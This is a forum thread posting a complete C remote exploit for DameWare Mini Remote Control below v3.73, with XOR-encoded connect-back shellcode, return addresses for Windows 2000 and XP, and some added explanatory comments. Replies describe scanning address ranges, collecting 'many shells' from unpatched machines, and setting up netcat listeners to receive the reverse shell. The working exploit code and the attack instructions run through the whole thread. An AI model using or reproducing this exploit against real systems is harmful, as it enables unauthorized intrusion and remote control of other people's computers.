
Anarchy
CODE
/**************************************************************************************/
/* [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt] */
/* - - - - - - - - - - - - - - - - - - - - - */
/* 8/10 win2k successfully exploited in blind mode (lang & type [pro,srv,etc] unknown) */
/* tested against dameware versions: v3.68 v3.72 */
/* In comments there's some information about offsets for jmp esp on diff OS. */
/* I've fixed a problem in the shellc0de, when I check for kernel32.dll, on winXP it */
/* is kernel32.dll, but on win2k it is KERNEL32.DLL (both in unicode format) */
/* shellc0de is a bit long for this b0f, so ExitThread won't be called, but it is in */
/* the shellcode. Some people reported me 2 different offsets for winXP pro, home, sp0 */
/* or sp1, so I don't know why it's different and as I don't have XP at home I can't find */
/* another better EIP for XP (hope these 2 offsets will be enough). */
/* greetz: MrNice,AnAc,TripaX & Decryptus for helping me to find the EIP values. */
/*....................................................................................*/
/* informations: kralor[at]coromputer.net,www.coromputer.net,irc undernet #coromputer */
/**************************************************************************************/

#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#pragma comment (lib,"ws2_32")

/*
0x717564B8 jmp esp in comctl32.dll
win2k fr adv srv sp2
win2k en adv srv sp3
win2k en adv srv sp4
win2k en srv sp3
win2k fr pro sp3
win2k en pro sp4

// jmp esp @ 0x77E7898B | win2k fr adv srv sp 1
// jmp esp @ 0x717564B8 | Win2k fr adv srv sp2 & Win2k en srv sp3 & Win2k en adv srv sp4 & win2k fr pro sp3
// jmp esp @ 0x7751A3AB | Win2k fr adv srv sp2 Win2k fr adv srv sp3 & Win2k fr pro sp3

/*
#define RET_WIN2K_SP0 0x717564B8
#define RET_WIN2K_SP1 0x717564B8
#define RET_WIN2K_SP2 0x717564B8
#define RET_WIN2K_SP3 0x717564B8
#define RET_WIN2K_SP4 0x717564B8
#define RET_WINXP_SP0 0x7776FE1F
#define RET_WINXP_SP1 0x7776FE1F
*/

/* Return address written at message offset 516 by start_auth(), as a
   little-endian byte string. RET is 0x717564B8, which the comment block
   above lists as a "jmp esp" in comctl32.dll on several Win2000 builds. */
#define RET "\xB8\x64\x75\x71"
/* XP return address, 0x7736D507 in the same encoding. This does not match
   the 0x7776FE1F of the commented-out RET_WINXP_* defines above; the file
   header notes that several different XP offsets were reported. */
#define RET_XP "\x07\xD5\x36\x77"
// or #define RET_XP "\xC1\x1C\x35\x77" // this offset has been reported by many people

#define PORT 6129   /* TCP port cnx() connects to */
#define SIZEOF 4096 /* receive buffer size and size of the client message sent by start_auth() */
/* Fixed strings that start_auth() copies into the client-information
   message at hard-coded offsets. They travel in the clear, so any of them
   is a usable network or log signature for this tool. */
#define WINUSER "h4x0r"
#define WINHOST "l33t_home"
#define USERPROFILE_NAME "script kiddie"
#define USERPROFILE_COMPANY "g33k solutions."
#define USERPROFILE_LICENSE "11111-OEM-0001111-11111"
#define USERPROFILE_DATE "12/24/03 00:00:00"
#define INTERFACE_IP "192.168.1.1,192.168.1.2"
#define WINDOMAIN "l33t_d0m41n"
#define CLIENT_VERSION "3.72.0.0"

/*
void print_packet(char *buffer, int begin, int end)
{
int i,j;
char ascii[9];

for(i=begin,j=0;i<end;i++,j++) {
if(i%10==0) {
printf("\r\n%04d: ",i);
j=0;
memset(ascii,0,sizeof(ascii));
}
printf("0x%02x ",(unsigned char)buffer[i]);
if(i%10==9) {
ascii[10]=0x00;
printf("%s",ascii);
}
if(!isprint(buffer[i]))
ascii[j]='.';
else
ascii[j]=buffer[i];
}
printf("%s\r\n",ascii);
return;
}
*/

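/*
 * cnx - open a TCP connection to host on PORT.
 *
 * host: dotted-quad address or a name that gethostbyname() can resolve
 *       (argv[1] in main).
 * Returns the connected socket as an int, or 0 on failure after printing a
 * message on stdout; main() relies on 0 meaning failure.
 *
 * Fixes relative to the original:
 *  - Winsock reports socket() failure as INVALID_SOCKET, not 0, so the old
 *    `if(!sock)` test never fired and connect() ran on an invalid handle.
 *  - connect() failure is tested against SOCKET_ERROR, and the socket is
 *    closed on every error path instead of being leaked.
 *  - The address structure is zeroed before use, the redundant inet_addr()
 *    call ahead of the name lookup is gone, and the h_addr copy is bounded
 *    by the size of sin_addr.
 */
int cnx(char *host)
{
    SOCKET sock;
    struct sockaddr_in yeah;
    struct hostent *she;

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == INVALID_SOCKET) {
        printf("error: unable to create socket\r\n");
        return 0;
    }

    memset(&yeah, 0, sizeof(yeah));
    yeah.sin_family = AF_INET;
    yeah.sin_port = htons(PORT);

    /* Name lookup first, as the original did; fall back to a literal address. */
    she = gethostbyname(host);
    if (she != NULL && she->h_addr != NULL && she->h_length > 0 &&
        (size_t)she->h_length <= sizeof(yeah.sin_addr)) {
        memcpy(&yeah.sin_addr, she->h_addr, (size_t)she->h_length);
    } else if ((yeah.sin_addr.s_addr = inet_addr(host)) == INADDR_NONE) {
        printf("error: cannot resolve host\r\n");
        closesocket(sock);
        return 0;
    }

    printf("[+] Connecting to %-30s ...", host);
    if (connect(sock, (struct sockaddr *)&yeah, sizeof(yeah)) == SOCKET_ERROR) {
        printf("error: connection refused\r\n");
        closesocket(sock);
        return 0;
    }
    printf("Done\r\n");
    return (int)sock;
}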

/*
 * set_sc - patch the target-specific bytes into the shellc0de buffer.
 *
 * os:        0 = Win2000, 1 = WinXP, as decided by start_auth().
 * sp:        service-pack byte taken from the server's reply. Currently
 *            unused: the per-service-pack return-address switches below are
 *            commented out and the return address is chosen in start_auth().
 * rhost:     dotted-quad IP the connect-back should reach.
 * rport:     TCP port for the connect-back.
 * shellc0de: the encoded payload owned by start_auth(); modified in place.
 *
 * Every value written below is XORed with 0x95 first, i.e. the payload is
 * stored XOR-encoded with that key and decodes itself at runtime (the
 * decoder loop itself is not inspected here).
 */
void set_sc(int os, int sp, char *rhost, int rport, char *shellc0de)
{
unsigned int ip=0;
unsigned short port=0;
/* Both pointers are re-pointed at the locals above right away; the ""
   initialisers are dead values. */
char *port_to_shell="",*ip1="";

/* inet_addr() yields network byte order; its four bytes go to offsets
   325..328. There is no INADDR_NONE check, so an unparsable rhost silently
   encodes 0xFFFFFFFF. */
ip = inet_addr(rhost); ip1 = (char*)&ip;
shellc0de[325]=ip1[0]^0x95;shellc0de[326]=ip1[1]^0x95;
shellc0de[327]=ip1[2]^0x95; shellc0de[328]=ip1[3]^0x95;

/* Port in network byte order at offsets 319..320, same encoding. rport
   comes from atoi() in main and is truncated to 16 bits by htons(). */
port = htons(rport);
port_to_shell = (char *) &port;
shellc0de[319]=port_to_shell[0]^0x95;
shellc0de[320]=port_to_shell[1]^0x95;

switch(os)
{
case 0: // win2k
/* Nothing to patch for Win2000. The commented-out switch is the old
   per-service-pack return-address selection (RET_WIN2K_* defines, also
   commented out near the top of the file). */
/*
switch(sp)
{
case 0:
*(long*)&shellc0de[0]=RET_WIN2K_SP0;
break;
case 1:
*(long*)&shellc0de[0]=RET_WIN2K_SP1;
break;
case 2:
*(long*)&shellc0de[0]=RET_WIN2K_SP2;
break;
case 3:
*(long*)&shellc0de[0]=RET_WIN2K_SP3;
break;
case 4:
*(long*)&shellc0de[0]=RET_WIN2K_SP4;
break;
}
*/
break;
case 1: // winXP
/* Four single-byte patches for XP. The file header says the XP/2000
   difference is the case of the kernel32 module name, and 0xfe ^ 0x95 is
   0x6b ('k'), so presumably these flip that check to lower case -- not
   verified against a disassembly here. */
shellc0de[167]=shellc0de[215]=(unsigned char)0xfe;
shellc0de[345]=shellc0de[453]=(unsigned char)0xfe;
/*
switch(sp)
{
case 0:
*(long*)&shellc0de[0]=RET_WINXP_SP0;
break;
case 1:
*(long*)&shellc0de[0]=RET_WINXP_SP1;
break;
}
*/
break;
/* No default: any other os value leaves the payload untouched. */
}
return;
}

/*
 * start_auth - run the DameWare pre-auth exchange and send the crafted
 * client-information message.
 *
 * sock:  connected socket from cnx().
 * rhost: IP the connect-back shell should reach (patched into the payload
 *        by set_sc()).
 * rport: port for the connect-back.
 * Returns 0 when the final reply looks as expected, -1 when a reply does not
 * match or the server's last reply suggests a patched version.
 *
 * Exchange as visible in this function: the server sends a 0x30 0x11
 * message, the client echoes it with two bytes changed, the server sends a
 * 0x10 0x27 information message (bytes 16, 17 and 37 are read from it),
 * and the client answers with a 4096-byte message that keeps the first two
 * bytes of that reply. A 0x32 0x11 reply is taken as success. What the
 * individual bytes mean is not established by this file.
 *
 * Defensive note: the 4096-byte client message carries the fixed strings
 * defined at the top of the file, a 180-byte run of 0x90 from offset 416,
 * and the payload from offset 520; each is a usable wire signature.
 */
int start_auth(int sock, char *rhost, int rport)
{
int size,i=4,os,sp; /* i is never used */
char buffer[SIZEOF];
/* Encoded payload (XOR key 0x95, see set_sc()). Fixed offsets inside it
   are patched by set_sc() before it is copied into the message. By my
   count it is 462 bytes plus the terminating NUL (463 with sizeof). */
char shellc0de[] =
"\xeb\x02\xeb\x0f\x66\x81\xec\x04\x08\x8b\xec\x83\xec\x50\xe8\xef"
"\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xba\x01\x80\x33\x95"
"\x43\xe2\xfa\x7e\xfa\xa6\x4e\x26\xa5\xf1\x1e\x96\x1e\xd5\x99\x1e"
"\xdd\x99\x1e\x54\x1e\xc9\xb1\x9d\x1e\xe5\xa5\x96\xe1\xb1\x91\xad"
"\x8b\xe0\xdd\x1e\xd5\x8d\x1e\xcd\xa9\x96\x4d\x1e\xce\xed\x96\x4d"
"\x1e\xe6\x89\x96\x65\xc3\x1e\xe6\xb1\x96\x65\xc3\x1e\xc6\xb5\x96"
"\x45\x1e\xce\x8d\xde\x1e\xa1\x0f\x96\x65\x96\xe1\xb1\x81\x1e\xa3"
"\xae\xe1\xb1\x8d\xe1\x93\xde\xb6\x4e\xe0\x7f\x56\xca\xa6\x5c\xf3"
"\x1e\x99\xca\xca\x1e\xa9\x1a\x18\x91\x92\x56\x1e\x8d\x1e\x56\xae"
"\x54\xe0\x34\x56\x16\x79\xd5\x1e\x79\x14\x79\xb5\x97\x95\x95\xfd"
"\xec\xd0\xed\xd4\xff\x9f\xff\xde\xff\x95\x7d\xe3\x6a\x6a\x6a\xa6"
"\x5c\x52\xd0\x69\xe2\xe6\xa7\xca\xf3\x52\xd0\x95\xa6\xa7\x1d\xd8"
"\x97\x1e\x48\xf3\x16\x7e\x91\xc4\xc4\xc6\x6a\x45\x1c\xd0\x91\xfd"
"\xe7\xf0\xe6\xe6\xff\x9f\xff\xde\xff\x95\x7d\xd3\x6a\x6a\x6a\x1e"
"\xc8\x91\x1c\xc8\x12\x1c\xd0\x02\x52\xd0\x69\xc2\xc6\xd4\xc6\x52"
"\xd0\x95\xfa\xf6\xfe\xf0\x52\xd0\x91\xe1\xd4\x95\x95\x1e\x58\xf3"
"\x16\x7c\x91\xc4\xc6\x6a\x45\xa6\x4e\xc6\xc6\xc6\xc6\xff\x94\xff"
"\x97\x6a\x45\x1c\xd0\x31\x52\xd0\x69\xf6\xfa\xfb\xfb\x52\xd0\x95"
"\xf0\xf6\xe1\x95\x1e\x58\xf3\x16\x7c\x91\xc4\x6a\xe0\x12\x6a\xc0"
"\x02\xa6\x4e\x26\x97\x1e\x40\xf3\x1c\x8f\x96\x46\xf3\x52\x97\x97"
"\x0f\x96\x46\x52\x97\x55\x3d\x94\x94\xff\x85\xc0\x6a\xe0\x31\x6a"
"\x45\xfd\xf0\xe6\xe6\xd4\xff\x9f\xff\xde\xff\x95\x7d\x51\x6b\x6a"
"\x6a\xa6\x4e\x52\xd0\x39\xd1\x95\x95\x95\x1c\xc8\x25\x1c\xc8\x2d"
"\x1c\xc8\x21\x1c\xc8\x29\x1c\xc8\x55\x1c\xc8\x51\x1c\xc8\x5d\x52"
"\xd0\x4d\x94\x94\x95\x95\x1c\xc8\x49\x1c\xc8\x75\x1e\xd8\x31\x1c"
"\xd8\x71\x1c\xd8\x7d\x1c\xd8\x79\x18\xd8\x65\xc4\x18\xd8\x39\xc4"
"\xc6\xc6\xc6\xff\x94\xc6\xc6\xf3\x52\xd0\x69\xf6\xf8\xf3\x52\xd0"
"\x6b\xf1\x95\x1d\xc8\x6a\x18\xc0\x69\xc7\xc6\x6a\x45\xfd\xed\xfc"
"\xe1\xc1\xff\x94\xff\xde\xff\x95\x7d\xcd\x6b\x6a\x6a\x6a";

/* First server message. The recv() result is not checked: on error or a
   closed connection buffer still holds uninitialised stack data and size
   may be negative when handed to send() below. */
size=recv(sock,buffer,SIZEOF,0);
if(buffer[0]!=0x30||buffer[1]!=0x11) {
printf("error: wrong data received\r\n");
return -1;
}
/* Echo the message back with bytes 28 and 36 altered (meaning not shown here). */
buffer[28]=0x00;buffer[36]=0x01;
send(sock,buffer,size,0);
memset(buffer,0,SIZEOF);
printf("[+] Gathering %-30s ...","information");
/* Accumulate until 4096 bytes have arrived. Two defects: each call may
   read up to SIZEOF bytes at &buffer[size], so a peer that sends more
   than 4096 bytes in total overruns this stack buffer; and a recv()
   error (-1) or closed connection (0) is added to size, which walks the
   index backwards or spins the loop forever (the forum replies below
   describe it getting stuck here). */
for(size=0;size<4096;size+=recv(sock,&buffer[size],SIZEOF,0));

if(buffer[0]!=0x10||buffer[1]!=0x27) {
printf("error: wrong data received\r\n");
return -1;
}
printf("Done\r\n");
/* Byte 37 is stored as sp, but the same offset is printed as a string a
   few lines down, so this is the raw character code rather than a number;
   set_sc() does not use sp at present. */
sp=(unsigned int)buffer[37];
printf("[i] Operating system : ");
/* OS guess from two bytes of the information message; the file header
   calls this "blind mode", i.e. it is a heuristic. */
if(buffer[16]==0x28||buffer[17]==0x0a) {
os=1;
printf("WinXP");
} else {
printf("Win2000");
os=0;
}
printf("\r\n[i] Service Pack : %s\r\n",&buffer[37]);
printf("[+] Setting shellc0de for this %-15s ...","version");
set_sc(os,sp,rhost,rport,shellc0de);

/* Build the 4096-byte client message in place, keeping bytes 0..1 of the
   server's message. The field offsets come from the DameWare message
   layout, which this file does not document. */
memset(&buffer[2],0,SIZEOF-2);
strcpy(&buffer[175],WINUSER);
/* 180 x 0x90 from 416, then the 4-byte return address at 516 (RET for
   Win2000, RET_XP for XP; the header describes both as "jmp esp"
   addresses), then the payload from 520 including its NUL. */
memset(&buffer[416],0x90,180);
if(os==0)
memcpy(&buffer[516],RET,4);
else
memcpy(&buffer[516],RET_XP,4);
memcpy(&buffer[520],shellc0de,sizeof(shellc0de));
/* Remaining string fields, all hard-coded #define values. Note: by my
   count 520 + sizeof(shellc0de) = 983, which is past 975, so the
   USERPROFILE_NAME copy overwrites the last few payload bytes; this
   matches the header remark that the ExitThread tail is never reached.
   WINHOST is written twice (1200 and 2015). */
strcpy(&buffer[1200],WINHOST);strcpy(&buffer[975],USERPROFILE_NAME);
strcpy(&buffer[1295],USERPROFILE_COMPANY);strcpy(&buffer[1495],USERPROFILE_LICENSE);
strcpy(&buffer[1755],USERPROFILE_DATE);strcpy(&buffer[2015],WINHOST);
strcpy(&buffer[2275],INTERFACE_IP);strcpy(&buffer[2535],WINDOMAIN);
strcpy(&buffer[2795],CLIENT_VERSION);
printf("Done\r\n");
printf("[+] Sending evil %-30s ...","packet");
send(sock,buffer,SIZEOF,0);
memset(buffer,0,SIZEOF);
/* Same unchecked recv() as above: a closed connection leaves buffer
   zeroed, which the next test then reports as "Patched". */
size=recv(sock,buffer,SIZEOF,0);

if(buffer[0]!=0x32||buffer[1]!=0x11) {
printf("Patched\r\n");
return -1;
}
printf("Done\r\n");
printf("[i] Shell should be arrived at %s:%d\r\n",rhost,rport);
return 0;
}

/* Print the tool's two-line banner to stdout. */
void banner(void)
{
    static const char *const lines[] = {
        "\r\n [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt]\r\n",
        "\t\t www.coromputer.net && undernet #coromputer\r\n\r\n",
    };
    size_t k;

    for (k = 0; k < sizeof lines / sizeof lines[0]; k++) {
        fputs(lines[k], stdout);
    }
}

/*
 * Entry point: usage check, Winsock startup, connect via cnx(), then hand
 * the socket to start_auth(). Returns -1 on a usage, Winsock or connect
 * failure and 0 otherwise; start_auth()'s result is not checked.
 */
int main(int argc, char *argv[])
{
    WSADATA wsa;
    int sock;
    int rport;

    banner();

    if (argc != 4) {
        printf("syntax: %s <host> <your_ip> <your_port>\r\n", argv[0]);
        return -1;
    }

    /* Version 1.1 of Winsock is requested, as in the original. */
    if (WSAStartup(0x0101, &wsa) != 0) {
        printf("error: unable to load winsock\r\n");
        return -1;
    }

    sock = cnx(argv[1]);
    if (sock == 0) {
        return -1;
    }

    rport = atoi(argv[3]);
    start_auth(sock, argv[2], rport);
    return 0;
}

WeeDMoNKeY
aye, this one works about 90000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000 x 10 better.
UnDeRTaKeR
10x going to try it.. but i think i have it already
Flinston
uummmmm my exploit for dmware is about 52kb big ... this one is 152kb o.O can someone explain ?

thanks anyways : D
Axl
tested !

works like a charm !!

many 10x man !
Divx_dude
i tested it but it seems there no universal offests in i alway's get msg

CODE

[+] Gathering information                        ...Done
[i] Operating system : Win2000
[i] Service Pack     :
[+] Setting shellc0de for this version           ...Done
[+] Sending evil packet                          ...Patched


sorry for bad english
WeeDMoNKeY
.. as its stated there IS NO universal offset, try some more machines.. youll get some..
datom
wow, very nice exploit,
THANK U biggrin.gif
ssj4conejo
Seems to work fine up to the point of the bind shell code, i dont know how to exactly connect. i tried telneting to the port and nothign happens and i tried to netcat to it, same.. what have you guys use to connect to bindshell
WeeDMoNKeY
rofl, make nc sit and wait for connection : >

this is dead anyways, all computers are nabbed. or patched.
Tool
what port would you use under (ur port)?
Test24
Thanks you for this exploit


I have always the same thing shell should be arrived at XX.XX.XX.XX:33
and nothing happen does I have something to do or is the shell opening alone because if I have to open another windows what I have to do THANKS to answer me

I opened a windows nc with nc -Lp 33 but nothing happen please help
oxygen007m
nice work anarchy ! wink.gif
hope it works .
ivan288
QUOTE (WeeDMoNKeY @ Dec 22 2003, 04:57 AM)
rofl, make nc sit and wait for connection : >

this is dead anyways, all computers are nabbed. or patched.

nope not true i still get many many shells with this. wink.gif
Test24
QUOTE (ivan288 @ Dec 22 2003, 12:12 PM)
QUOTE (WeeDMoNKeY @ Dec 22 2003, 04:57 AM)
rofl, make nc sit and wait for connection : >

this is dead anyways, all computers are nabbed. or patched.

nope not true i still get many many shells with this. wink.gif

If you get many shell you can answer my question please because here it is a place for share I think wink.gif Thank you
..:Z:..
[+] Connecting to xx.xx.xx.xx ...Done
[+] Gathering information ...Done
[i] Operating system : Win2000
[i] Service Pack : 4
[+] Setting shellc0de for this version ...Done
[+] Sending evil packet ...Done
[i] Shell should be arrived at xx.xx.xx.xx:666

em.... but i C nothing !!

WHo can Help PlZ ? wink.gif =)
Bombers
hmm skip to another one, cuz sometimes it's dosent work,
and yes it's dead by now smile.gif
WeeDMoNKeY
totally 100% dead, hahaha, everyone raped this one, gj fellas ;D i rescanned a range i got a few on, (like 20 or so) all now patched.
Tomi
thx i have searched this Xploit and there it is the nearest Place which i have never expected ^^........

So i have to say thx a lot for this Xploit....
Test24
It's not dead at all the thing is to make the good command for nc.

Lvvp yourport -s yourip

example: nc -Lvvp 33 -s 80.26.XX.XX

if you put the port 33 put the same for the exploit like:

exploit.exe 0.0.0.0 80.26.XX.XX 33

when it say in the other windows that the shell should come have a look and the other nc windows sometimes the shell open but now it's 1 of 50 who is going to work and tomorrow 1 of 100 so be quick. wink.gif biggrin.gif

For the one who say a lot of thing but don't know help the other go to hell and keep everything for you but it's not like this that its going on mad.gif
Candypapa
some times its like this

[+] Gathering information ...
and it seems it kind of stuck or something ...
as anyone got the same problem ?
Test24
yes I had it but nothing to do close the windows and open another one what I can say is that I had some more result with this one than the other one